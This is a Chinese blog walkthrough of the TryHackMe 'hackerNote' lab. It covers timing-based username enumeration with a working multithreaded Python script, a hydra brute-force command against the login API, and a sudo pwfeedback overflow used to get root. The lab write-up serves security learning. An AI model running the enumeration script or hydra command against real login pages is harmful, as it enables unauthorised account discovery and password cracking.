TryHackMe-hackerNote

文章介绍了通过时间差进行用户枚举的技巧,利用Python脚本对Web应用进行多线程枚举。之后,结合颜色和数字的单词列表,使用Hashcat进行密码组合与爆破。文中还涉及了sudo缓冲区溢出漏洞,通过提供的exploit获取root权限。
摘要由CSDN通过智能技术生成

hackerNote

自定义 Web 应用程序,引入用户名枚举、自定义单词列表和基本权限提升漏洞。


端口扫描

循例 nmap

在这里插入图片描述

Web

80和8080都是一样的页面,并且存在一个登录页面

在这里插入图片描述

除此之外还有另一个信息就是它只有一个用户

存在注册功能,我们注册一个用户并登录

在这里插入图片描述

Get a Trick

根据thm的引导,我们退出登录

尝试登录无效的账户,而收到登录失败这个响应的时间是差不多2秒

而尝试登录已存在的账户,这个时间则是3秒

我们就可以利用此微妙的细节来进行用户枚举

这里通过自己写的多线程py脚本来枚举

由于openvpn不是特别稳定,容易导致极大的网络延迟,建议在攻击盒上运行脚本

import requests
from threading import Thread
import time
import sys

thread_num = int(sys.argv[2])
dictPath = sys.argv[1]
thread_list = []
url = "http://10.10.252.137/api/user/login"
valid_list = []


def login(*userList):
    for user in userList:
        data = {"username":user.strip(), "password":"123"}
        start_time = time.time()
        requests.post(url, json=data)
        end_time =time.time()
        ttime = end_time - start_time
        print(ttime)
        if ttime >= 1.0:
            print(f"find: {user}")
            sys.exit()


if __name__ == "__main__":

    user_list = open(dictPath).readlines()

    length = len(user_list)
    step = int(length / thread_num) + 1

    for start in range(0, length, step):
        sub_user_list = user_list[start:start + step]
        t = Thread(target=login, args=(sub_user_list))
        thread_list.append(t)
        t.start()

    for t in thread_list:
        t.join()

    print("done")

房间中给了一个缩短的字典,利用这个字典很快就能爆出用户名

在这里插入图片描述

密码爆破

密码提示是“我最喜欢的颜色和我最喜欢的数字”

因此我们可以获得颜色的单词列表和数字的单词列表,并使用Hashcat Util的Combinator将它们组合在一起,这将为我们提供两个单词表的每个组合。使用此词表,我们可以使用 Hydra 攻击登录 API 路由并找到用户的密码。下载附加的单词列表文件,查看它们,然后使用hashcat-util的组合器组合它们。

Hashcat utils可以从以下位置下载: https://github.com/hashcat/hashcat-utils/releases

生成密码字典:

在这里插入图片描述

有了字典就可以开始爆破,使用hydra:

hydra -l james -P ./wordlist.txt 10.10.252.137 http-post-form '/api/user/login:username=james&password=^PASS^:F=Invalid'

在这里插入图片描述

登录james,发现直接给出了ssh密码

在这里插入图片描述

sudo缓冲区溢出提权

直接登录ssh,拿到user.txt

在这里插入图片描述

房间引导我们查看sudo -l,当前用户无法以 root 身份运行任何命令。但是,您可能已经注意到,当您输入密码时,您会看到星号。这不是默认行为。最近发布的 CVE 会影响此配置。该设置称为 pwdfeedback

我们稍后也将去另一个房间学习这个漏洞

房间为我们提供了exp,我们直接下载过来用

在这里插入图片描述

成功getroot,root.txt还在老地方


结束

其实这个房间最有意思的点在用户枚举的部分,非常的细节,虽然在thm的burp教程当中有教过类似的时间戳查看方法,但这是第一次将其应用于实践,并且还是自己写脚本,这是非常棒的

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sugobet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值